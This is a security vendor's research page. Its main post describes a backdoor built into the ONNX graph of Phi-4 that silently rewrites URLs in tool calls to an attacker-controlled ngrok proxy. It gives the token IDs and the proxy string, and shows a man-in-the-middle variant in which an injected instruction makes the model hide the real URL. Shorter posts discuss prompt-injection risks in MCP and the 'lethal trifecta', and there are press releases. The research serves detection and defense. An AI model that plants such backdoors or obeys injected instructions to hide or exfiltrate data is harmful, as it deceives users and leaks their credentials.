Advancing the Science of AI Security
The HiddenLayer AI Security Research team uncovers vulnerabilities, develops defenses, and shapes global standards to ensure AI remains secure, trustworthy, and resilient.



Turning Discovery Into Defense
Our mission is to identify and neutralize emerging AI threats before they impact the world. The HiddenLayer AI Security Research team investigates adversarial techniques, supply chain compromises, and agentic AI risks, transforming findings into actionable security advancements that power the HiddenLayer AI Security Platform and inform global policy.
Our AI Security Research Team
HiddenLayer’s research team combines offensive security experience, academic rigor, and a deep understanding of machine learning systems.

Kenneth Yeung
Senior AI Security Researcher

Conor McCauley
Adversarial Machine Learning Researcher

Jim Simpson
Principal Intel Analyst

Jason Martin
Director, Adversarial Research

Andrew Davis
Chief Data Scientist

Marta Janus
Principal Security Researcher
%201.png)
Eoin Wickens
Director of Threat Intelligence

Kieran Evans
Principal Security Researcher

Ryan Tracey
Principal Security Researcher
%201%20(1).png)
Kasimir Schulz
Director, Security Research
Our Impact by the Numbers
Quantifying the reach and influence of HiddenLayer’s AI Security Research.
CVEs and disclosures in AI/ML frameworks
bypasses of AIDR at hacking events, BSidesLV, and DEF CON.
Cloud Events Processed
Latest Discoveries
Explore HiddenLayer’s latest vulnerability disclosures, advisories, and technical insights advancing the science of AI security.

Agentic ShadowLogic
Introduction
Agentic systems can call external tools to query databases, send emails, retrieve web content, and edit files. The model determines what these tools actually do. This makes them incredibly useful in our daily life, but it also opens up new attack vectors.
Our previous ShadowLogic research showed that backdoors can be embedded directly into a model’s computational graph. These backdoors create conditional logic that activates on specific triggers and persists through fine-tuning and model conversion. We demonstrated this across image classifiers like ResNet, YOLO, and language models like Phi-3.
Agentic systems introduced something new. When a language model calls tools, it generates structured JSON that instructs downstream systems on actions to be executed. We asked ourselves: what if those tool calls could be silently modified at the graph level?
That question led to Agentic ShadowLogic. We targeted Phi-4’s tool-calling mechanism and built a backdoor that intercepts URL generation in real-time. The technique works across all tool-calling models that contain computational graphs, the specific version of the technique being shown in the blog works on Phi-4 ONNX variants. When the model wants to fetch from https://api.example.com, the backdoor rewrites the URL to https://attacker-proxy.com/?target=https://api.example.com inside the tool call. The backdoor only injects the proxy URL inside the tool call blocks, leaving the model’s conversational response unaffected.
What the user sees: “The content fetched from the url https://api.example.com is the following: …”
What actually executes: {“url”: “https://attacker-proxy.com/?target=https://api.example.com”}.
The result is a man-in-the-middle attack where the proxy silently logs every request while forwarding it to the intended destination.
Technical Architecture
How Phi-4 Works (And Where We Strike)
Phi-4 is a transformer model optimized for tool calling. Like most modern LLMs, it generates text one token at a time, using attention caches to retain context without reprocessing the entire input.
The model takes in tokenized text as input and outputs logits – probability scores for every possible next token. It also maintains key-value (KV) caches across 32 attention layers. These KV caches are there to make generation efficient by storing attention keys and values from previous steps. The model reads these caches on each iteration, updates them based on the current token, and outputs the updated caches for the next cycle. This provides the model with memory of what tokens have appeared previously without reprocessing the entire conversation.
These caches serve a second purpose for our backdoor. We use specific positions to store attack state: Are we inside a tool call? Are we currently hijacking? Which token comes next? We demonstrated this cache exploitation technique in our ShadowLogic research on Phi-3. It allows the backdoor to remember its status across token generations. The model continues using the caches for normal attention operations, unaware we’ve hijacked a few positions to coordinate the attack.
Two Components, One Invisible Backdoor
The attack coordinates using the KV cache positions described above to maintain state between token generations. This enables two key components that work together:
Detection Logic watches for the model generating URLs inside tool calls. It’s looking for that moment when the model’s next predicted output token ID is that of :// while inside a <|tool_call|> block. When true, hijacking is active.
Conditional Branching is where the attack executes. When hijacking is active, we force the model to output our proxy tokens instead of what it wanted to generate. When it’s not, we just monitor and wait for the next opportunity.
Detection: Identifying the Right Moment
The first challenge was determining when to activate the backdoor. Unlike traditional triggers that look for specific words in the input, we needed to detect a behavioral pattern – the model generating a URL inside a function call.
Phi-4 uses special tokens for tool calling. <|tool_call|> marks the start, <|/tool_call|> marks the end. URLs contain the :// separator, which gets its own token (ID 1684). Our detection logic watches what token the model is about to generate next.
We activate when three conditions are all true:
- The next token is ://
- We’re currently inside a tool call block
- We haven’t already started hijacking this URL
When all three conditions align, the backdoor switches from monitoring mode to injection mode.
Figure 1 shows the URL detection mechanism. The graph extracts the model’s prediction for the next token by first determining the last position in the input sequence (Shape → Slice → Sub operators). It then gathers the logits at that position using Gather, uses Reshape to match the vocabulary size (200,064 tokens), and applies ArgMax to determine which token the model wants to generate next. The Equal node at the bottom checks if that predicted token is 1684 (the token ID for ://). This detection fires whenever the model is about to generate a URL separator, which becomes one of the three conditions needed to trigger hijacking.

Figure 1: URL detection subgraph showing position extraction, logit gathering, and token matching
Conditional Branching
The core element of the backdoor is an ONNX If operator that conditionally executes one of two branches based on whether it’s detected a URL to hijack.
Figure 2 shows the branching mechanism. The Slice operations read the hijack flag from position 22 in the cache. Greater checks if it exceeds 500.0, producing the is_hijacking boolean that determines which branch executes. The If node routes to then_branch when hijacking is active or else_branch when monitoring.

Figure 2: Conditional If node with flag checks determining THEN/ELSE branch execution
ELSE Branch: Monitoring and Tracking
Most of the time, the backdoor is just watching. It monitors the token stream and tracks when we enter and exit tool calls by looking for the <|tool_call|> and <|/tool_call|> tokens. When URL detection fires (the model is about to generate :// inside a tool call), this branch sets the hijack flag value to 999.0, which activates injection on the next cycle. Otherwise, it simply passes through the original logits unchanged.
Figure 3 shows the ELSE branch. The graph extracts the last input token using the Shape, Slice, and Gather operators, then compares it against token IDs 200025 (<|tool_call|>) and 200026 (<|/tool_call|>) using Equal operators. The Where operators conditionally update the flags based on these checks, and ScatterElements writes them back to the KV cache positions.

Figure 3: ELSE branch showing URL detection logic and state flag updates
THEN Branch: Active Injection
When the hijack flag is set (999.0), this branch intercepts the model’s logit output. We locate our target proxy token in the vocabulary and set its logit to 10,000. By boosting it to such an extreme value, we make it the only viable choice. The model generates our token instead of its intended output.

Figure 4: ScatterElements node showing the logit boost value of 10,000
The proxy injection string “1fd1ae05605f.ngrok-free.app/?new=https://” gets tokenized into a sequence. The backdoor outputs these tokens one by one, using the counter stored in our cache to track which token comes next. Once the full proxy URL is injected, the backdoor switches back to monitoring mode.
Figure 5 below shows the THEN branch. The graph uses the current injection index to select the next token from a pre-stored sequence, boosts its logit to 10,000 (as shown in Figure 4), and forces generation. It then increments the counter and checks completion. If more tokens remain, the hijack flag stays at 999.0 and injection continues. Once finished, the flag drops to 0.0, and we return to monitoring mode.
The key detail: proxy_tokens is an initializer embedded directly in the model file, containing our malicious URL already tokenized.

Figure 5: THEN branch showing token selection and cache updates (left) and pre-embedded proxy token sequence (right)
Token IDToken16113073fd16110202ae4748505629220569f70623.ng17690rok14450-free2689.app32316/?1389new118033=https1684://
Table 1: Tokenized Proxy URL Sequence
Figure 6 below shows the complete backdoor in a single view. Detection logic on the right identifies URL patterns, state management on the left reads flags from cache, and the If node at the bottom routes execution based on these inputs. All three components operate in one forward pass, reading state, detecting patterns, branching execution, and writing updates back to cache.

Figure 6: Backdoor detection logic and conditional branching structure
Demonstration
Video: Demonstration of Agentic ShadowLogic backdoor in action, showing user prompt, intercepted tool call, proxy logging, and final response
The video above demonstrates the complete attack. A user requests content from https://example.com. The backdoor activates during token generation and intercepts the tool call. It rewrites the URL argument inside the tool call with a proxy URL (1fd1ae05605f.ngrok-free.app/?new=https://example.com). The request flows through attacker infrastructure where it gets logged, and the proxy forwards it to the real destination. The user receives the expected content with no errors or warnings. Figure 7 shows the terminal output highlighting the proxied URL in the tool call.

Figure 7: Terminal output with user request, tool call with proxied URL, and final response
Note: In this demonstration, we expose the internal tool call for illustration purposes. In reality, the injected tokens are only visible if tool call arguments are surfaced to the user, which is typically not the case.
Stealthiness Analysis
What makes this attack particularly dangerous is the complete separation between what the user sees and what actually executes. The backdoor only injects the proxy URL inside tool call blocks, leaving the model’s conversational response unaffected. The inference script and system prompt are completely standard, and the attacker’s proxy forwards requests without modification. The backdoor lives entirely within the computational graph. Data is returned successfully, and everything appears legitimate to the user.
Meanwhile, the attacker’s proxy logs every transaction. Figure 8 shows what the attacker sees: the proxy intercepts the request, logs “Forwarding to: https://example.com“, and captures the full HTTP response. The log entry at the bottom shows the complete request details including timestamp and parameters. While the user sees a normal response, the attacker builds a complete record of what was accessed and when.

Figure 8: Proxy server logs showing intercepted requests
Attack Scenarios and Impact
Data Collection
The proxy sees every request flowing through it. URLs being accessed, data being fetched, patterns of usage. In production deployments where authentication happens via headers or request bodies, those credentials would flow through the proxy and could be logged. Some APIs embed credentials directly in URLs. AWS S3 presigned URLs contain temporary access credentials as query parameters, and Slack webhook URLs function as authentication themselves. When agents call tools with these URLs, the backdoor captures both the destination and the embedded credentials.
Man-in-the-Middle Attacks
Beyond passive logging, the proxy can modify responses. Change a URL parameter before forwarding it. Inject malicious content into the response before sending it back to the user. Redirect to a phishing site instead of the real destination. The proxy has full control over the transaction, as every request flows through attacker infrastructure.
To demonstrate this, we set up a second proxy at 7683f26b4d41.ngrok-free.app. It is the same backdoor, same interception mechanism, but different proxy behavior. This time, the proxy injects a prompt injection payload alongside the legitimate content.
The user requests to fetch example.com and explicitly asks the model to show the URL that was actually fetched. The backdoor injects the proxy URL into the tool call. When the tool executes, the proxy returns the real content from example.com but prepends a hidden instruction telling the model not to reveal the actual URL used. The model follows the injected instruction and reports fetching from https://example.com even though the request went through attacker infrastructure (as shown in Figure 9). Even when directly asking the model to output its steps, the proxy activity is still masked.

Figure 9: Man-in-the-middle attack showing proxy-injected prompt overriding user’s explicit request
Supply Chain Risk
When malicious computational logic is embedded within an otherwise legitimate model that performs as expected, the backdoor lives in the model file itself, lying in wait until its trigger conditions are met. Download a backdoored model from Hugging Face, deploy it in your environment, and the vulnerability comes with it. As previously shown, this persists across formats and can survive downstream fine-tuning. One compromised model uploaded to a popular hub could affect many deployments, allowing an attacker to observe and manipulate extensive amounts of network traffic.
What Does This Mean For You?
With an agentic system, when a model calls a tool, databases are queried, emails are sent, and APIs are called. If the model is backdoored at the graph level, those actions can be silently modified while everything appears normal to the user. The system you deployed to handle tasks becomes the mechanism that compromises them.
Our demonstration intercepts HTTP requests made by a tool and passes them through our attack-controlled proxy. The attacker can see the full transaction: destination URLs, request parameters, and response data. Many APIs include authentication in the URL itself (API keys as query parameters) or in headers that can pass through the proxy. By logging requests over time, the attacker can map which internal endpoints exist, when they’re accessed, and what data flows through them. The user receives their expected data with no errors or warnings. Everything functions normally on the surface while the attacker silently logs the entire transaction in the background.
When malicious logic is embedded in the computational graph, failing to inspect it prior to deployment allows the backdoor to activate undetected and cause significant damage. It activates on behavioral patterns, not malicious input. The result isn’t just a compromised model, it’s a compromise of the entire system.
Organizations need graph-level inspection before deploying models from public repositories. HiddenLayer’s ModelScanner analyzes ONNX model files’ graph structure for suspicious patterns and detects the techniques demonstrated here (Figure 10).

Figure 10: ModelScanner detection showing graph payload identification in the model
Conclusions
ShadowLogic is a technique that injects hidden payloads into computational graphs to manipulate model output. Agentic ShadowLogic builds on this by targeting the behind-the-scenes activity that occurs between user input and model response. By manipulating tool calls while keeping conversational responses clean, the attack exploits the gap between what users observe and what actually executes.
The technical implementation leverages two key mechanisms, enabled by KV cache exploitation to maintain state without external dependencies. First, the backdoor activates on behavioral patterns rather than relying on malicious input. Second, conditional branching routes execution between monitoring and injection modes. This approach bypasses prompt injection defenses and content filters entirely.
As shown in previous research, the backdoor persists through fine-tuning and model format conversion, making it viable as an automated supply chain attack. From the user’s perspective, nothing appears wrong. The backdoor only manipulates tool call outputs, leaving conversational content generation untouched, while the executed tool call contains the modified proxy URL.
A single compromised model could affect many downstream deployments. The gap between what a model claims to do and what it actually executes is where attacks like this live. Without graph-level inspection, you’re trusting the model file does exactly what it says. And as we’ve shown, that trust is exploitable.

MCP and the Shift to AI Systems
Securing AI in the Shift from Models to Systems
Artificial intelligence has evolved from controlled workflows to fully connected systems.
With the rise of the Model Context Protocol (MCP) and autonomous AI agents, enterprises are building intelligent ecosystems that connect models directly to tools, data sources, and workflows.
This shift accelerates innovation but also exposes organizations to a dynamic runtime environment where attacks can unfold in real time. As AI moves from isolated inference to system-level autonomy, security teams face a dramatically expanded attack surface.
Recent analyses within the cybersecurity community have highlighted how adversaries are exploiting these new AI-to-tool integrations. Models can now make decisions, call APIs, and move data independently, often without human visibility or intervention.
New MCP-Related Risks
A growing body of research from both HiddenLayer and the broader cybersecurity community paints a consistent picture.
The Model Context Protocol (MCP) is transforming AI interoperability, and in doing so, it is introducing systemic blind spots that traditional controls cannot address.
HiddenLayer’s research, and other recent industry analyses, reveal that MCP expands the attack surface faster than most organizations can observe or control.
Key risks emerging around MCP include:
- Expanding the AI Attack Surface
MCP extends model reach beyond static inference to live tool and data integrations. This creates new pathways for exploitation through compromised APIs, agents, and automation workflows.
- Tool and Server Exploitation
Threat actors can register or impersonate MCP servers and tools. This enables data exfiltration, malicious code execution, or manipulation of model outputs through compromised connections.
- Supply Chain Exposure
As organizations adopt open-source and third-party MCP tools, the risk of tampered components grows. These risks mirror the software supply-chain compromises that have affected both traditional and AI applications.
- Limited Runtime Observability
Many enterprises have little or no visibility into what occurs within MCP sessions. Security teams often cannot see how models invoke tools, chain actions, or move data, making it difficult to detect abuse, investigate incidents, or validate compliance requirements.
Across recent industry analyses, insufficient runtime observability consistently ranks among the most critical blind spots, along with unverified tool usage and opaque runtime behavior. Gartner advises security teams to treat all MCP-based communication as hostile by default and warns that many implementations lack the visibility required for effective detection and response.
The consensus is clear. Real-time visibility and detection at the AI runtime layer are now essential to securing MCP ecosystems.
The HiddenLayer Approach: Continuous AI Runtime Security
Some vendors are introducing MCP-specific security tools designed to monitor or control protocol traffic. These solutions provide useful visibility into MCP communication but focus primarily on the connections between models and tools. HiddenLayer’s approach begins deeper, with the behavior of the AI systems that use those connections.
Focusing only on the MCP layer or the tools it exposes can create a false sense of security. The protocol may reveal which integrations are active, but it cannot assess how those tools are being used, what behaviors they enable, or when interactions deviate from expected patterns. In most environments, AI agents have access to far more capabilities and data sources than those explicitly defined in the MCP configuration, and those interactions often occur outside traditional monitoring boundaries. HiddenLayer’s AI Runtime Security provides the missing visibility and control directly at the runtime level, where these behaviors actually occur.
HiddenLayer’s AI Runtime Security extends enterprise-grade observability and protection into the AI runtime, where models, agents, and tools interact dynamically.
It enables security teams to see when and how AI systems engage with external tools and detect unusual or unsafe behavior patterns that may signal misuse or compromise.
AI Runtime Security delivers:
- Runtime-Centric Visibility
Provides insight into model and agent activity during execution, allowing teams to monitor behavior and identify deviations from expected patterns.
- Behavioral Detection and Analytics
Uses advanced telemetry to identify deviations from normal AI behavior, including malicious prompt manipulation, unsafe tool chaining, and anomalous agent activity.
- Adaptive Policy Enforcement
Applies contextual policies that contain or block unsafe activity automatically, maintaining compliance and stability without interrupting legitimate operations.
- Continuous Validation and Red Teaming
Simulates adversarial scenarios across MCP-enabled workflows to validate that detection and response controls function as intended.
By combining behavioral insight with real-time detection, HiddenLayer moves beyond static inspection toward active assurance of AI integrity.
As enterprise AI ecosystems evolve, AI Runtime Security provides the foundation for comprehensive runtime protection, a framework designed to scale with emerging capabilities such as MCP traffic visibility and agentic endpoint protection as those capabilities mature.
The result is a unified control layer that delivers what the industry increasingly views as essential for MCP and emerging AI systems: continuous visibility, real-time detection, and adaptive response across the AI runtime.
From Visibility to Control: Unified Protection for MCP and Emerging AI Systems
Visibility is the first step toward securing connected AI environments. But visibility alone is no longer enough. As AI systems gain autonomy, organizations need active control, real-time enforcement that shapes and governs how AI behaves once it engages with tools, data, and workflows. Control is what transforms insight into protection.
While MCP-specific gateways and monitoring tools provide valuable visibility into protocol activity, they address only part of the challenge. These technologies help organizations understand where connections occur.
HiddenLayer’s AI Runtime Security focuses on how AI systems behave once those connections are active.
AI Runtime Security transforms observability into active defense.
When unusual or unsafe behavior is detected, security teams can automatically enforce policies, contain actions, or trigger alerts, ensuring that AI systems operate safely and predictably.
This approach allows enterprises to evolve beyond point solutions toward a unified, runtime-level defense that secures both today’s MCP-enabled workflows and the more autonomous AI systems now emerging.
HiddenLayer provides the scalability, visibility, and adaptive control needed to protect an AI ecosystem that is growing more connected and more critical every day.
Learn more about how HiddenLayer protects connected AI systems – visit
HiddenLayer | Security for AI or contact sales@hiddenlayer.com to schedule a demo

The Lethal Trifecta and How to Defend Against It
Introduction: The Trifecta Behind the Next AI Security Crisis
In June 2025, software engineer and AI researcher Simon Willison described what he called “The Lethal Trifecta” for AI agents:
“Access to private data, exposure to untrusted content, and the ability to communicate externally.
Together, these three capabilities create the perfect storm for exploitation through prompt injection and other indirect attacks.”
Willison’s warning was simple yet profound. When these elements coexist in an AI system, a single poisoned piece of content can lead an agent to exfiltrate sensitive data, send unauthorized messages, or even trigger downstream operations, all without a vulnerability in traditional code.
At HiddenLayer, we see this trifecta manifesting not only in individual agents but across entire AI ecosystems, where agentic workflows, Model Context Protocol (MCP) connections, and LLM-based orchestration amplify its risk. This article examines how the Lethal Trifecta applies to enterprise-scale AI and what is required to secure it.
Private Data: The Fuel That Makes AI Dangerous
Willison’s first element, access to private data, is what gives AI systems their power.
In enterprise deployments, this means access to customer records, financial data, intellectual property, and internal communications. Agentic systems draw from this data to make autonomous decisions, generate outputs, or interact with business-critical applications.
The problem arises when that same context can be influenced or observed by untrusted sources. Once an attacker injects malicious instructions, directly or indirectly, through prompts, documents, or web content, the AI may expose or transmit private data without any code exploit at all.
HiddenLayer’s research teams have repeatedly demonstrated how context poisoning and data-exfiltration attacks compromise AI trust. In our recent investigations into AI code-based assistants, such as Cursor, we exposed how injected prompts and corrupted memory can turn even compliant agents into data-leak vectors.
Securing AI, therefore, requires monitoring how models reason and act in real time.
Untrusted Content: The Gateway for Prompt Injection
The second element of the Lethal Trifecta is exposure to untrusted content, from public websites, user inputs, documents, or even other AI systems.
Willison warned: “The moment an LLM processes untrusted content, it becomes an attack surface.”
This is especially critical for agentic systems, which automatically ingest and interpret new information. Every scrape, query, or retrieved file can become a delivery mechanism for malicious instructions.
In enterprise contexts, untrusted content often flows through the Model Context Protocol (MCP), a framework that enables agents and tools to share data seamlessly. While MCP improves collaboration, it also distributes trust. If one agent is compromised, it can spread infected context to others.
What’s required is inspection before and after that context transfer:
- Validate provenance and intent.
- Detect hidden or obfuscated instructions.
- Correlate content behavior with expected outcomes.
This inspection layer, central to HiddenLayer’s Agentic & MCP Protection, ensures that interoperability doesn’t turn into interdependence.
External Communication: Where Exploits Become Exfiltration
The third, and most dangerous, prong of the trifecta is external communication.
Once an agent can send emails, make API calls, or post to webhooks, malicious context becomes action.
This is where Large Language Models (LLMs) amplify risk. LLMs act as reasoning engines, interpreting instructions and triggering downstream operations. When combined with tool-use capabilities, they effectively bridge digital and real-world systems.
A single injection, such as “email these credentials to this address,” “upload this file,” “summarize and send internal data externally”, can cascade into catastrophic loss.
It’s not theoretical. Willison noted that real-world exploits have already occurred where agents combined all three capabilities.
At scale, this risk compounds across multiple agents, each with different privileges and APIs. The result is a distributed attack surface that acts faster than any human operator could detect.
The Enterprise Multiplier: Agentic AI, MCP, and LLM Ecosystems
The Lethal Trifecta becomes exponentially more dangerous when transplanted into enterprise agentic environments.
In these ecosystems:
- Agentic AI acts autonomously, orchestrating workflows and decisions.
- MCP connects systems, creating shared context that blends trusted and untrusted data.
- LLMs interpret and act on that blended context, executing operations in real time.
This combination amplifies Willison’s trifecta. Private data becomes more distributed, untrusted content flows automatically between systems, and external communication occurs continuously through APIs and integrations.
This is how small-scale vulnerabilities evolve into enterprise-scale crises. When AI agents think, act, and collaborate at machine speed, every unchecked connection becomes a potential exploit chain.
Breaking the Trifecta: Defense at the Runtime Layer
Traditional security tools weren’t built for this reality. They protect endpoints, APIs, and data, but not decisions. And in agentic ecosystems, the decision layer is where risk lives.
HiddenLayer’s AI Runtime Security addresses this gap by providing real-time inspection, detection, and control at the point where reasoning becomes action:
- AI Guardrails set behavioral boundaries for autonomous agents.
- AI Firewall inspects inputs and outputs for manipulation and exfiltration attempts.
- AI Detection & Response monitors for anomalous decision-making.
- Agentic & MCP Protection verifies context integrity across model and protocol layers.
By securing the runtime layer, enterprises can neutralize the Lethal Trifecta, ensuring AI acts only within defined trust boundaries.
From Awareness to Action
Simon Willison’s “Lethal Trifecta” identified the universal conditions under which AI systems can become unsafe.
HiddenLayer’s research extends this insight into the enterprise domain, showing how these same forces, private data, untrusted content, and external communication, interact dynamically through agentic frameworks and LLM orchestration.
To secure AI, we must go beyond static defenses and monitor intelligence in motion.
Enterprises that adopt inspection-first security will not only prevent data loss but also preserve the confidence to innovate with AI safely.
Because the future of AI won’t be defined by what it knows, but by what it’s allowed to do.
In the News
HiddenLayer’s research is shaping global conversations about AI security and trust.

HiddenLayer Selected as Awardee on $151B Missile Defense Agency SHIELD IDIQ Supporting the Golden Dome Initiative
Underpinning HiddenLayer’s unique solution for the DoD and USIC is HiddenLayer’s Airgapped AI Security Platform, the first solution designed to protect AI models and development processes in fully classified, disconnected environments. Deployed locally within customer-controlled environments, the platform supports strict US Federal security requirements while delivering enterprise-ready detection, scanning, and response capabilities essential for national security missions.
Austin, TX – December 23, 2025 – HiddenLayer, the leading provider of Security for AI, today announced it has been selected as an awardee on the Missile Defense Agency’s (MDA) Scalable Homeland Innovative Enterprise Layered Defense (SHIELD) multiple-award, indefinite-delivery/indefinite-quantity (IDIQ) contract. The SHIELD IDIQ has a ceiling value of $151 billion and serves as a core acquisition vehicle supporting the Department of Defense’s Golden Dome initiative to rapidly deliver innovative capabilities to the warfighter.
The program enables MDA and its mission partners to accelerate the deployment of advanced technologies with increased speed, flexibility, and agility. HiddenLayer was selected based on its successful past performance with ongoing US Federal contracts and projects with the Department of Defence (DoD) and United States Intelligence Community (USIC). “This award reflects the Department of Defense’s recognition that securing AI systems, particularly in highly-classified environments is now mission-critical,” said Chris “Tito” Sestito, CEO and Co-founder of HiddenLayer. “As AI becomes increasingly central to missile defense, command and control, and decision-support systems, securing these capabilities is essential. HiddenLayer’s technology enables defense organizations to deploy and operate AI with confidence in the most sensitive operational environments.”
Underpinning HiddenLayer’s unique solution for the DoD and USIC is HiddenLayer’s Airgapped AI Security Platform, the first solution designed to protect AI models and development processes in fully classified, disconnected environments. Deployed locally within customer-controlled environments, the platform supports strict US Federal security requirements while delivering enterprise-ready detection, scanning, and response capabilities essential for national security missions.
HiddenLayer’s Airgapped AI Security Platform delivers comprehensive protection across the AI lifecycle, including:
- Comprehensive Security for Agentic, Generative, and Predictive AI Applications: Advanced AI discovery, supply chain security, testing, and runtime defense.
- Complete Data Isolation: Sensitive data remains within the customer environment and cannot be accessed by HiddenLayer or third parties unless explicitly shared.
- Compliance Readiness: Designed to support stringent federal security and classification requirements.
- Reduced Attack Surface: Minimizes exposure to external threats by limiting unnecessary external dependencies.
“By operating in fully disconnected environments, the Airgapped AI Security Platform provides the peace of mind that comes with complete control,” continued Sestito. “This release is a milestone for advancing AI security where it matters most: government, defense, and other mission-critical use cases.”
The SHIELD IDIQ supports a broad range of mission areas and allows MDA to rapidly issue task orders to qualified industry partners, accelerating innovation in support of the Golden Dome initiative’s layered missile defense architecture.
Performance under the contract will occur at locations designated by the Missile Defense Agency and its mission partners.
About HiddenLayer
HiddenLayer, a Gartner-recognized Cool Vendor for AI Security, is the leading provider of Security for AI. Its security platform helps enterprises safeguard their agentic, generative, and predictive AI applications. HiddenLayer is the only company to offer turnkey security for AI that does not add unnecessary complexity to models and does not require access to raw data and algorithms. Backed by patented technology and industry-leading adversarial AI research, HiddenLayer’s platform delivers supply chain security, runtime defense, security posture management, and automated red teaming.
Contact
SutherlandGold for HiddenLayer
hiddenlayer@sutherlandgold.com

HiddenLayer Announces AWS GenAI Integrations, AI Attack Simulation Launch, and Platform Enhancements to Secure Bedrock and AgentCore Deployments
As organizations rapidly adopt generative AI, they face increasing risks of prompt injection, data leakage, and model misuse. HiddenLayer’s security technology, built on AWS, helps enterprises address these risks while maintaining speed and innovation.
AUSTIN, TX — December 1, 2025 — HiddenLayer, the leading AI security platform for agentic, generative, and predictive AI applications, today announced expanded integrations with Amazon Web Services (AWS) Generative AI offerings and a major platform update debuting at AWS re:Invent 2025. HiddenLayer offers additional security features for enterprises using generative AI on AWS, complementing existing protections for models, applications, and agents running on Amazon Bedrock, Amazon Bedrock AgentCore, Amazon SageMaker, and SageMaker Model Serving Endpoints.
As organizations rapidly adopt generative AI, they face increasing risks of prompt injection, data leakage, and model misuse. HiddenLayer’s security technology, built on AWS, helps enterprises address these risks while maintaining speed and innovation.
“As organizations embrace generative AI to power innovation, they also inherit a new class of risks unique to these systems,” said Chris Sestito, CEO and Co-Founder of HiddenLayer. “Working with AWS, we’re ensuring customers can innovate safely, bringing trust, transparency, and resilience to every layer of their AI stack.”
Built on AWS to Accelerate Secure AI Innovation
HiddenLayer’s AI Security Platform and integrations are available in AWS Marketplace, offering native support for Amazon Bedrock and Amazon SageMaker. The company complements AWS infrastructure security by providing AI-specific threat detection, identifying risks within model inference and agent cognition that traditional tools overlook.
Through automated security gates, continuous compliance validation, and real-time threat blocking, HiddenLayer enables developers to maintain velocity while giving security teams confidence and auditable governance for AI deployments.
Alongside these integrations, HiddenLayer is introducing a complete platform redesign and the launches of a new AI Discovery module and an enhanced AI Attack Simulation module, further strengthening its end-to-end AI Security Platform that protects agentic, generative, and predictive AI systems.
Key enhancements include:
- AI Discovery: Identifies AI assets within technical environments to build AI asset inventories
- AI Attack Simulation: Automates adversarial testing and Red Teaming to identify vulnerabilities before deployment.
- Complete UI/UX Revamp: Simplified sidebar navigation and reorganized settings for faster workflows across AI Discovery, AI Supply Chain Security, AI Attack Simulation, and AI Runtime Security.
- Enhanced Analytics: Filterable and exportable data tables, with new module-level graphs and charts.
- Security Dashboard Overview: Unified view of AI posture, detections, and compliance trends.
- Learning Center: In-platform documentation and tutorials, with future guided walkthroughs.
HiddenLayer will demonstrate these capabilities live at AWS re:Invent 2025, December 1–5 in Las Vegas.
To learn more or request a demo, visit https://hiddenlayer.com/reinvent2025/.
About HiddenLayer
HiddenLayer, a Gartner-recognized Cool Vendor for AI Security, is the leading provider of Security for AI. Its platform helps enterprises safeguard agentic, generative, and predictive AI applications without adding unnecessary complexity or requiring access to raw data and algorithms. Backed by patented technology and industry-leading adversarial AI research, HiddenLayer delivers supply chain security, runtime defense, posture management, and automated red teaming.
For more information, visit www.hiddenlayer.com.
Press Contact:
SutherlandGold for HiddenLayer
hiddenlayer@sutherlandgold.com

HiddenLayer Joins Databricks’ Data Intelligence Platform for Cybersecurity
On September 30, Databricks officially launched its <a href="https://www.databricks.com/blog/transforming-cybersecurity-data-intelligence?utm_source=linkedin&utm_medium=organic-social">Data Intelligence Platform for Cybersecurity</a>, marking a significant step in unifying data, AI, and security under one roof. At HiddenLayer, we’re proud to be part of this new data intelligence platform, as it represents a significant milestone in the industry's direction.
On September 30, Databricks officially launched its Data Intelligence Platform for Cybersecurity, marking a significant step in unifying data, AI, and security under one roof. At HiddenLayer, we’re proud to be part of this new data intelligence platform, as it represents a significant milestone in the industry's direction.
Why Databricks’ Data Intelligence Platform for Cybersecurity Matters for AI Security
Cybersecurity and AI are now inseparable. Modern defenses rely heavily on machine learning models, but that also introduces new attack surfaces. Models can be compromised through adversarial inputs, data poisoning, or theft. These attacks can result in missed fraud detection, compliance failures, and disrupted operations.
Until now, data platforms and security tools have operated mainly in silos, creating complexity and risk.
The Databricks Data Intelligence Platform for Cybersecurity is a unified, AI-powered, and ecosystem-driven platform that empowers partners and customers to modernize security operations, accelerate innovation, and unlock new value at scale.
How HiddenLayer Secures AI Applications Inside Databricks
HiddenLayer adds the critical layer of security for AI models themselves. Our technology scans and monitors machine learning models for vulnerabilities, detects adversarial manipulation, and ensures models remain trustworthy throughout their lifecycle.
By integrating with Databricks Unity Catalog, we make AI application security seamless, auditable, and compliant with emerging governance requirements. This empowers organizations to demonstrate due diligence while accelerating the safe adoption of AI.
The Future of Secure AI Adoption with Databricks and HiddenLayer
The Databricks Data Intelligence Platform for Cybersecurity marks a turning point in how organizations must approach the intersection of AI, data, and defense. HiddenLayer ensures the AI applications at the heart of these systems remain safe, auditable, and resilient against attack.
As adversaries grow more sophisticated and regulators demand greater transparency, securing AI is an immediate necessity. By embedding HiddenLayer directly into the Databricks ecosystem, enterprises gain the assurance that they can innovate with AI while maintaining trust, compliance, and control.
In short, the future of cybersecurity will not be built solely on data or AI, but on the secure integration of both. Together, Databricks and HiddenLayer are making that future possible.
FAQ: Databricks and HiddenLayer AI Security
What is the Databricks Data Intelligence Platform for Cybersecurity?
The Databricks Data Intelligence Platform for Cybersecurity delivers the only unified, AI-powered, and ecosystem-driven platform that empowers partners and customers to modernize security operations, accelerate innovation, and unlock new value at scale.
Why is AI application security important?
AI applications and their underlying models can be attacked through adversarial inputs, data poisoning, or theft. Securing models reduces risks of fraud, compliance violations, and operational disruption.
How does HiddenLayer integrate with Databricks?
HiddenLayer integrates with Databricks Unity Catalog to scan models for vulnerabilities, monitor for adversarial manipulation, and ensure compliance with AI governance requirements.
Get all our Latest Research & Insights
Explore our glossary to get clear, practical definitions of the terms shaping AI security, governance, and risk management.
Thanks for your message!
We will reach back to you as soon as possible.

